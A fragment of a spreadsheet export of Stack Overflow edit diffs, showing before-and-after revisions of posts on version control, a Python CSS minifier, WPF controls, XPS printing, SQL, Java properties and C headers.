 &lt;p&gt; The real question is - what is it about perforce that is not meeting your organization's needs that git can provide? And similarly, what weaknesses does git have compared to perforce? If you can't answer that yourself then asking here won't help. You need to find a business case for your company. (e.g. Perhaps it is with lower overall cost of ownership (that includes loss of productivity for the interim learning stage, higher admin costs (at least initially), etc.)&lt;/p&gt; _x000D_
 &lt;p&gt; I think you are in for a tough sell - perforce is a pretty good one to try to replace. It is a no brainer if you are trying to boot out pvcs or ssafe.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tim</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been arguing with some friends on the university, and we can't get to a point to which is the framework with more scalability for web applications (and still very fast).&lt;/p&gt; _x000D_
 &lt;p&gt; One calls for jsp, the other one for ruby other for php and so on. Could i ask you to clarify us on what as more scalability potential?&lt;/p&gt; _x000D_
 &lt;p&gt; Tks, hope I'm not duplicating anything I've searched but didn't found any previous question like this.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: If you could point a comparison about this it would be good&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been arguing with some friends on the university, and we can't get to a point to which is the framework with more scalability for web applications (and still very fast).&lt;/p&gt; _x000D_
 &lt;p&gt; One calls for jsp, the other one for ruby other for php and so on. Could i ask you to clarify us on what as more scalability potential?&lt;/p&gt; _x000D_
 &lt;p&gt; Tks, hope I'm not duplicating anything I've searched but didn't found any previous question like this.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: If you could point a comparison about this it would be good&lt;span class="diff-add"&gt; :)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import sys, re_x000D_
&lt;span class="diff-delete"&gt;SELECTOR_RE = re.compile(r'(?&amp;lt;=[\[\(&amp;gt;+=])\s+|\s+(?=[=~^$*|&amp;gt;+\]\)])')&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;PROPERTY_RE = re.compile('(.*?):(.*?)(;|$)')_x000D_
RULE_RE = re.compile(r'([^{]+){([^}]*)}')_x000D_
HACK1 = re.compile(r'\s*/\*\s*\*/')_x000D_
HACK2 = re.compile(r'/\*[\s\S]*?\*/')_x000D_
URL = re.compile(r'url\((["\'])([^)]*)\1\)')_x000D_
SPACES = re.compile(r'\s+')_x000D_
SHORTEN_COLORS&lt;/span&gt; = &lt;span class="diff-delete"&gt;re.compile(r'#([0-9a-f])\1([0-9a-f])\2([0-9a-f])\3&lt;/span&gt;(&lt;span class="diff-delete"&gt;\s|;)')_x000D_
FRAGMENTS&lt;/span&gt; &lt;span class="diff-delete"&gt;= re.compile(r':\s*0(\&lt;/span&gt;.&lt;span class="diff-delete"&gt;\d+([cm]m|e[mx]|in|p[ctx]))\s*;')_x000D_
_x000D_
def minify_css(filename):_x000D_
    with&lt;/span&gt; &lt;span class="diff-delete"&gt;open(filename&lt;/span&gt;, 'r'&lt;span class="diff-delete"&gt;) as f:_x000D_
       &lt;/span&gt; &lt;span class="diff-delete"&gt;css = f&lt;/span&gt;.read()_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;# remove comments - this will break a lot of hacks :-P_x000D_
&lt;span class="diff-delete"&gt;    _x000D_
    &lt;/span&gt;css = re.sub(&lt;span class="diff-delete"&gt;HACK1&lt;/span&gt;, "$$HACK1$$", css ) # preserve IE&amp;lt;6 comment hack_x000D_
&lt;span class="diff-delete"&gt; _x000D_
    &lt;/span&gt;css = re.sub(&lt;span class="diff-delete"&gt;HACK2&lt;/span&gt;, "", css )_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;css = css.replace( "$$HACK1$$", '/**/' ) # preserve IE&amp;lt;6 comment hack_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;# url() doesn't need quotes&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;css = re.sub(&lt;span class="diff-delete"&gt;URL&lt;/span&gt;, r'url(\2)', css )_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;# spaces may be safely collapsed as generated content will collapse them anyway&lt;span class="diff-delete"&gt;_x000D_
    &lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;css = re.sub(&lt;span class="diff-delete"&gt;SPACES&lt;/span&gt;, ' ', css )_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;# shorten collapsable colors: #aabbcc to #abc&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;css = re.sub( &lt;span class="diff-delete"&gt;SHORTEN_COLORS&lt;/span&gt;, r'#\1\2\3\4', css )_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;# fragment values can loose zeros&lt;span class="diff-delete"&gt;_x000D_
 &lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;css = re.sub(&lt;span class="diff-delete"&gt;FRAGMENTS&lt;/span&gt;, r':\1;', css )_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    output = []_x000D_
    &lt;/span&gt;for rule in re.findall( &lt;span class="diff-delete"&gt;RULE_RE&lt;/span&gt;, css ):_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    # we don't need spaces around operators_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    selectors = [re.sub( &lt;span class="diff-delete"&gt;SELECTOR_RE&lt;/span&gt;, r'', selector.strip() ) for selector in rule[0].split( ',' )]_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    # order is important, but we still want to discard repetitions_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    properties = {}_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    porder = []_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    for prop in re.findall( &lt;span class="diff-delete"&gt;PROPERTY_RE&lt;/span&gt;, rule[1] ):_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        key = prop[0].strip().lower()_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        if key not in porder: porder.append( key )_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        properties[ key ] = prop[1].strip()_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    # output rule if it contains any declarations_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    if properties:_x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;         &lt;span class="diff-delete"&gt;output.append(&lt;/span&gt;"%s{%s}" % ( ','.join( selectors ), ''.join(['%s:%s;' % (key, properties[key]) for key in porder])[:-1] )&lt;span class="diff-delete"&gt; )_x000D_
   &lt;/span&gt; &lt;span class="diff-delete"&gt;return ''.join(output)_x000D_
_x000D_
def main():_x000D_
    css_filename = sys.argv[1:2][0]_x000D_
    if css_filename:_x000D_
        print minify_css(css_filename)_x000D_
    else:_x000D_
        sys.exit("No filename given")_x000D_
_x000D_
if __name__ == '__main__':_x000D_
    main()&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import sys, re_x000D_
_x000D_
&lt;span class="diff-add"&gt;css&lt;/span&gt; = &lt;span class="diff-add"&gt;open&lt;/span&gt;( &lt;span class="diff-add"&gt;sys&lt;/span&gt;.&lt;span class="diff-add"&gt;argv[1]&lt;/span&gt; , 'r' &lt;span class="diff-add"&gt;)&lt;/span&gt;.read()_x000D_
_x000D_
# remove comments - this will break a lot of hacks :-P_x000D_
css = re.sub(&lt;span class="diff-add"&gt; r'\s*/\*\s*\*/'&lt;/span&gt;, "$$HACK1$$", css ) # preserve IE&amp;lt;6 comment hack_x000D_
css = re.sub(&lt;span class="diff-add"&gt; r'/\*[\s\S]*?\*/'&lt;/span&gt;, "", css )_x000D_
css = css.replace( "$$HACK1$$", '/**/' ) # preserve IE&amp;lt;6 comment hack_x000D_
_x000D_
# url() doesn't need quotes_x000D_
css = re.sub(&lt;span class="diff-add"&gt; r'url\((["\'])([^)]*)\1\)'&lt;/span&gt;, r'url(\2)', css )_x000D_
_x000D_
# spaces may be safely collapsed as generated content will collapse them anyway_x000D_
css = re.sub(&lt;span class="diff-add"&gt; r'\s+'&lt;/span&gt;, ' ', css )_x000D_
_x000D_
# shorten collapsable colors: #aabbcc to #abc_x000D_
css = re.sub( &lt;span class="diff-add"&gt;r'#([0-9a-f])\1([0-9a-f])\2([0-9a-f])\3(\s|;)'&lt;/span&gt;, r'#\1\2\3\4', css )_x000D_
_x000D_
# fragment values can loose zeros_x000D_
css = re.sub(&lt;span class="diff-add"&gt; r':\s*0(\.\d+([cm]m|e[mx]|in|p[ctx]))\s*;'&lt;/span&gt;, r':\1;', css )_x000D_
_x000D_
for rule in re.findall( &lt;span class="diff-add"&gt;r'([^{]+){([^}]*)}'&lt;/span&gt;, css ):_x000D_
_x000D_
    # we don't need spaces around operators_x000D_
    selectors = [re.sub( &lt;span class="diff-add"&gt;r'(?&amp;lt;=[\[\(&amp;gt;+=])\s+|\s+(?=[=~^$*|&amp;gt;+\]\)])'&lt;/span&gt;, r'', selector.strip() ) for selector in rule[0].split( ',' )]_x000D_
_x000D_
    # order is important, but we still want to discard repetitions_x000D_
    properties = {}_x000D_
    porder = []_x000D_
    for prop in re.findall( &lt;span class="diff-add"&gt;'(.*?):(.*?)(;|$)'&lt;/span&gt;, rule[1] ):_x000D_
        key = prop[0].strip().lower()_x000D_
        if key not in porder: porder.append( key )_x000D_
        properties[ key ] = prop[1].strip()_x000D_
_x000D_
    # output rule if it contains any declarations_x000D_
    if properties:_x000D_
        &lt;span class="diff-add"&gt;print&lt;/span&gt; "%s{%s}" % ( ','.join( selectors ), ''.join(['%s:%s;' % (key, properties[key]) for key in porder])[:-1] ) _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jeff Tratner</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's no definitive &lt;strong&gt;right way&lt;/strong&gt;, because so many people are doing so many different things..&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Crockford&lt;/strong&gt; suggests that you "go with the grain", or write javascript in a way that corresponds to javascript's prototypal nature.&lt;/p&gt; _x000D_
 &lt;p&gt; Of course, he goes on to show that the original model that Netscape suggested is actually broken. He labels it "pseudoclassical", and points out a lot of the misdirection and unnecessary complexity that is involved in following that model.&lt;/p&gt; _x000D_
 &lt;p&gt; He wrote the "object" function as a remedy (now known as Object.create() ). It allows for some very powerful prototypal patterns.&lt;/p&gt; _x000D_
 &lt;p&gt; It's not always easy to do develop a clean interface when you have to work with legacy javascript, especially not when you're dealing with large systems which usually include multiple libraries, each implementing a different pattern. In general, I'd say that the "right way" is the one which allows you to write a clean interface which behaves well in the context of your legacy code, but also allows you to refactor and eliminate old dependencies over time.&lt;/p&gt; _x000D_
 &lt;p&gt; Considering the differences between the major library patterns, I've found that the most successful route to take in my own work is to keep my interfaces independent of the libraries entirely. I'll use a library or module if it's helpful, but won't be bound to it. This has allowed me to refactor a lot of code, phase out some libraries, and use libraries as scaffolding which can be optimized later.&lt;/p&gt; _x000D_
 &lt;p&gt; Along these lines, I've written interfaces that were inspired by Crockford's parasitic inheritance pattern. It's really a win for simplicity.&lt;/p&gt; _x000D_
 &lt;p&gt; On the other side of the coin, I'm sure you could argue for picking a library, enforcing it across your team, and conforming to its patterns.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There's no definitive &lt;strong&gt;right way&lt;/strong&gt;, because so many people are doing so many different things..&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Crockford&lt;/strong&gt; suggests that you "go with the grain", or write javascript in a way that corresponds to javascript's prototypal nature.&lt;/p&gt; _x000D_
 &lt;p&gt; Of course, he goes on to show that the original model that Netscape suggested is actually broken. He labels it "pseudoclassical", and points out a lot of the misdirection and unnecessary complexity that is involved in following that model.&lt;/p&gt; _x000D_
 &lt;p&gt; He wrote the "object" function as a remedy (now known as Object.create() ). It allows for some very powerful prototypal patterns.&lt;/p&gt; _x000D_
 &lt;p&gt; It's not always easy to do develop a clean interface when you have to work with legacy javascript, especially not when you're dealing with large systems which usually include multiple libraries, each implementing a different pattern. In general, I'd say that the "right way" is the one which allows you to write a clean interface which behaves well in the context of your legacy code, but also allows you to refactor and eliminate old dependencies over time.&lt;/p&gt; _x000D_
 &lt;p&gt; Considering the differences between the major library patterns, I've found that the most successful route to take in my own work is to keep my interfaces independent of the libraries entirely. I'll use a library or module if it's helpful, but won't be bound to it. This has allowed me to refactor a lot of code, phase out some libraries, and use libraries as scaffolding which can be optimized later.&lt;/p&gt; _x000D_
 &lt;p&gt; Along these lines, I've written interfaces that were inspired by Crockford's parasitic inheritance pattern. It's really a win for simplicity.&lt;/p&gt; _x000D_
 &lt;p&gt; On the other side of the coin, I'm sure you could argue for picking a library, enforcing it across your team, and conforming to&lt;span class="diff-add"&gt; both&lt;/span&gt; its&lt;span class="diff-add"&gt; inheritance&lt;/span&gt; patterns&lt;span class="diff-add"&gt; and its interface conventions&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;_x000D_
  foobarbaz _x000D_
 &lt;p&gt; I would like then to display a b c not:&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; a&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; b&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; c&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;_x000D_
  foobarbaz _x000D_
 &lt;p&gt; I would like then to display a b c not:&lt;span class="diff-add"&gt; a&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; b&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; c&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I wrote this thinking you were talking about WPF, rather than Silverlight, but there may be enough overlap for this to be helpful, so I'm posting it, anyway.&lt;/p&gt; _x000D_
 &lt;p&gt; If by "change the appearance of the base class" you mean "provide a new template", then what you need is probably a CustomControl not a UserControl.&lt;/p&gt; _x000D_
 &lt;p&gt; The best way to accomplish this is to follow the example set by other Microsoft controls, such as Button or ListBox:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Create a class that derives directly from Control (or whatever is closest to your control).&lt;/li&gt; _x000D_
  &lt;li&gt; If any properties will need to be exposed to the control (such as text on a button, for example), make sure that you properly define them as DependencyProperties.&lt;/li&gt; _x000D_
  &lt;li&gt; As described &lt;a href="http://msdn.microsoft.com/en-us/library/ms745025.aspx" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, create a ResourceDictionary called Themes/generic.xaml and add a style for your class that includes a template (don't give the style a key).&lt;/li&gt; _x000D_
  &lt;li&gt; Use TemplateBindings for any properties of elements on your control that need to get values from your control.&lt;/li&gt; _x000D_
  &lt;li&gt; If you'll need to attach any event handlers to elements in your template, give them a unique name. Microsoft uses the convention of prefixing these names with "PART_", and I think it's a good thing to do for the sake of consistency, but it's not strictly required.&lt;/li&gt; _x000D_
  &lt;li&gt; Again, if you need to attach event handlers, overload OnApplyTemplate(). In this method, you should detach any old event handlers (we certainly don't want any memory leaks!), and look for elements that have the names your provided in your template--when you find them, attach event handlers, as necessary.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; This is certainly much more work than simply deriving from UserControl, but if you want to be able to totally re-template controls, like you can with the built-in controls, this is the way to do it.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;On the other hand&lt;/em&gt;, if all you want to do is to provide a certain amount of limited customization, such as changing the background, or associating a Command with some user action, then the best thing to do is to expose DependencyProperties, which can then be set in styles for your control, or on instances of your control, itself.&lt;/p&gt; _x000D_
 &lt;p&gt; In the case you mentioned of wanting to customize the look in an inherited control, the process is pretty similar: just add a default style for the new control with a new template; if you need to add more event handlers, just be absolutely certain that you call base.OnApplyTemplate().&lt;span class="diff-delete"&gt; .&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I wrote this thinking you were talking about WPF, rather than Silverlight, but there may be enough overlap for this to be helpful, so I'm posting it, anyway.&lt;/p&gt; _x000D_
 &lt;p&gt; If by "change the appearance of the base class" you mean "provide a new template", then what you need is probably a CustomControl not a UserControl.&lt;/p&gt; _x000D_
 &lt;p&gt; The best way to accomplish this is to follow the example set by other Microsoft controls, such as Button or ListBox:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Create a class that derives directly from Control (or whatever is closest to your control).&lt;/li&gt; _x000D_
  &lt;li&gt; If any properties will need to be exposed to the control (such as text on a button, for example), make sure that you properly define them as DependencyProperties.&lt;/li&gt; _x000D_
  &lt;li&gt; As described &lt;a href="http://msdn.microsoft.com/en-us/library/ms745025.aspx" rel="nofollow noreferrer"&gt;here&lt;/a&gt;, create a ResourceDictionary called Themes/generic.xaml and add a style for your class that includes a template (don't give the style a key).&lt;/li&gt; _x000D_
  &lt;li&gt; Use TemplateBindings for any properties of elements on your control that need to get values from your control.&lt;/li&gt; _x000D_
  &lt;li&gt; If you'll need to attach any event handlers to elements in your template, give them a unique name. Microsoft uses the convention of prefixing these names with "PART_", and I think it's a good thing to do for the sake of consistency, but it's not strictly required.&lt;/li&gt; _x000D_
  &lt;li&gt; Again, if you need to attach event handlers, overload OnApplyTemplate(). In this method, you should detach any old event handlers (we certainly don't want any memory leaks!), and look for elements that have the names your provided in your template--when you find them, attach event handlers, as necessary.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; This is certainly much more work than simply deriving from UserControl, but if you want to be able to totally re-template controls, like you can with the built-in controls, this is the way to do it.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;On the other hand&lt;/em&gt;, if all you want to do is to provide a certain amount of limited customization, such as changing the background, or associating a Command with some user action, then the best thing to do is to expose DependencyProperties, which can then be set in styles for your control, or on instances of your control, itself.&lt;/p&gt; _x000D_
 &lt;p&gt; In the case you mentioned of wanting to customize the look in an inherited control, the process is pretty similar: just add a default style for the new control with a new template; if you need to add more event handlers, just be absolutely certain that you call base.OnApplyTemplate().&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Amanda Mitchell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My printer ran out of black toner and I didnâ€™t have a spare, so I thought itâ€™d be a good idea to â€œprintâ€? documents to .XPS files for now, then print them when the new toner arrives.&lt;/p&gt; _x000D_
 &lt;p&gt; So, now I have my toner but I canâ€™t work out how to print the files. I found this great post on Tim Barczâ€™s blog which seems to indicate Iâ€™m not alone: &lt;a href="http://www.timbarcz.com/blog/HowToPrintXPSDocumentsEasyAs11a1aI233a45.aspx" rel="nofollow noreferrer"&gt;http://www.timbarcz.com/blog/HowToPrintXPSDocumentsEasyAs11a1aI233a45.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I can open them and view them in IE, but if I try to print them it either ignores the command altogether or crashes.&lt;/p&gt; _x000D_
 &lt;p&gt; I downloaded the XPS Essentials Pack from the Microsoft website and tried to install it, but it refuses to install and keeps crashing with a ten-page error message. Ironically, I would normally print this message out to deal with it.&lt;/p&gt; _x000D_
 &lt;p&gt; My â€œsolutionâ€? is to open the .XPS files in IE, then screenshot them and paste them into Paint Shop Pro so I can print them as graphics.&lt;/p&gt; _x000D_
 &lt;p&gt; As Tim Barcz says in his post that I linked to:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; â€œThatâ€™s itâ€¦simple. What I donâ€™t get is why people are so afraid to embrace new technology?â€?&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My printer ran out of black toner and I didnâ€™t have a spare, so I thought itâ€™d be a good idea to â€œprintâ€? documents to .XPS files for now, then print them when the new toner arrives.&lt;/p&gt; _x000D_
 &lt;p&gt; So, now I have my toner but I canâ€™t work out how to print the files. I found this great post on Tim Barczâ€™s blog which seems to indicate Iâ€™m not alone: &lt;a href="http://www.timbarcz.com/blog/HowToPrintXPSDocumentsEasyAs11a1aI233a45.aspx" rel="nofollow noreferrer"&gt;http://www.timbarcz.com/blog/HowToPrintXPSDocumentsEasyAs11a1aI233a45.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I can open them and view them in IE, but if I try to print them it either ignores the command altogether or crashes.&lt;/p&gt; _x000D_
 &lt;p&gt; I downloaded the XPS Essentials Pack from the Microsoft website and tried to install it, but it refuses to install and keeps crashing with a ten-page error message. Ironically, I would normally print this message out to deal with it.&lt;/p&gt; _x000D_
 &lt;p&gt; My â€œsolutionâ€? is to open the .XPS files in IE, then screenshot them and paste them into Paint Shop Pro so I can print them as graphics.&lt;/p&gt; _x000D_
 &lt;p&gt; As Tim Barcz says in his post that I linked to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;â€œThatâ€™s itâ€¦simple. What I donâ€™t get is why people are so afraid to embrace new technology?â€?_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Scorpio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-delete"&gt;echo -n "Please enter some input: "_x000D_
read input_variable_x000D_
echo "You entered: $input_variable"_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;echo "Please enter some input: "_x000D_
read input_variable_x000D_
echo "You entered: $input_variable"_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zz'Rot</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; In SQL, which has better performance, JOIN or EXISTS?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Specifically,&lt;/span&gt; I have two tables&lt;span class="diff-delete"&gt; -&lt;/span&gt; Institutions and Results&lt;span class="diff-delete"&gt; -&lt;/span&gt; and I want to see if there are any results for institutions&lt;span class="diff-delete"&gt;, so&lt;/span&gt; that I can exclude the ones that don't have results&lt;span class="diff-delete"&gt;..&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you,&lt;br&gt; -Nimesh&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have two tables Institutions and Results and I want to see if there are any results for institutions that&lt;span class="diff-add"&gt; way&lt;/span&gt; I can exclude the ones that don't have results.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Can I get better performance using a JOIN or using EXISTS?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you,&lt;br&gt; -Nimesh&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chris Marasti-Georg</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;System.getProperty("os.name")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; P.S. You may find this code useful:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class ShowProperties {_x000D_
    public static void main(String[] args) {_x000D_
        System.getProperties().list(System.out);_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; All it does is print out all the properties provided by your Java implementations. It'll give you an idea of what you can find out about your Java environment via properties. :-)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; To Print The Property you can use:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;System.out.println(System.getProperty("os.name"));_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(Just in case you didn't know)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;System.getProperty("os.name")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; P.S. You may find this code useful:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class ShowProperties {_x000D_
    public static void main(String[] args) {_x000D_
        System.getProperties().list(System.out);_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; All it does is print out all the properties provided by your Java implementations. It'll give you an idea of what you can find out about your Java environment via properties. :-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sebagius7110</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Something like this?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for letter in range(ord('a'), ord('z') + 1):_x000D_
  print(chr(letter))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; This alone prints the Alphabet, no other action is needed as far as I am aware...&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Something like this?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;for letter in range(ord('a'), ord('z') + 1):_x000D_
  print&lt;span class="diff-add"&gt; chr(letter) + ":", lowertext.count&lt;/span&gt;(chr(letter))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;(I don't speak Python; please forgive my syntax errors)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Community ?</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; ###if this structure is to be used by some other file func.c how to do it?&lt;/p&gt; _x000D_
 &lt;p&gt; When a type is used in a file (i.e. func.c file), it must be visible. The very worst way to do it is copy paste it in each source file needed it.&lt;/p&gt; _x000D_
 &lt;p&gt; The right way is putting it in an header file, and include this header file whenever needed.&lt;/p&gt; _x000D_
 &lt;p&gt; ###shall we open a new header file and declare the structure there and include that header in the func.c?&lt;/p&gt; _x000D_
 &lt;p&gt; This is the solution I like more, because it makes the code highly modular. I would code your struct as:&lt;/p&gt; _x000D_
